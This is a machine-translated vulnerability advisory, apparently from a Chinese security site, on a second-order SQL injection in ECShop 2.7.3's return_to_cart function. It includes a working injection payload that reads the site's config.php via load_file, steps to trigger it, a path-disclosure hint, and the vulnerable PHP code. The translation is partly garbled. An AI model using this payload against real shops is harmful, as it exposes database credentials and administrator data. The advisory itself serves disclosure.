ecshop 2.73 lib_transaction. php file to secondary SQL injection vulnerability analysis-vulnerability warning-the black bar safety net

2014-01-03T00:00:00
ID MYHACK58:62201441643
Type myhack58
Reporter 蘑菇街
Modified 2014-01-03T00:00:00

Description

A secondary injection, insert type, can be directly read from the database administrator information Use of process: find a product to purchase, modify the color of the radio buttons value2'),('6', 'c4598c0015367d28cfcb267fffc750fd', '1 3', 'ECS000013', mid(load_file('C:/wamp/www/ec/data/config.php'),7 0,1 2 0), '1573.20', '1 2 0 0', '3', ", '1', ", '0', '0', '0', '2 1 7') – a

!

Then save, go to the settlement, submit the order, go to user center, find the order, open it, point the“put repurchase was the car“

!

There has been a trigger injection, we then go to shopping cart to see

!

Database information. Relates to version: ECShop_V2. 7. 3_UTF8_release1106 whether login is required: if the default configuration: is the presence or absence of the use of the code: code Vulnerability details: Giving away an explosive path vulnerability 有利 于 我们 获取 数据库 配置 文件 物理 位置 /install/templates/active.php Analysis of vulnerability causes:\includes\lib_transaction. php this method function return_to_cart($order_id)see the following code // To return the shopping cart of goods

$return_goods = array( 'goods_id' => $row['goods_id'], 'goods_sn' => addslashes($goods['goods_sn']), 'goods_name' => addslashes($goods['goods_name']), 'market_price' => $goods['market_price'], 'goods_price' => $goods['goods_price'], 'goods_number' => $row['goods_number'], 'goods_attr' => empty($row['goods_attr']) ? " : addslashes($row['goods_attr']), 'goods_attr_id' => empty($row['goods_attr_id']) ? " : $row['goods_attr_id'], 'is_real' => $goods['is_real'], 'extension_code'=> addslashes($goods['extension_code']), 'parent_id' => '0', 'is_gift' => '0', 'rec_type' => CART_GENERAL_GOODS

[1] [2] next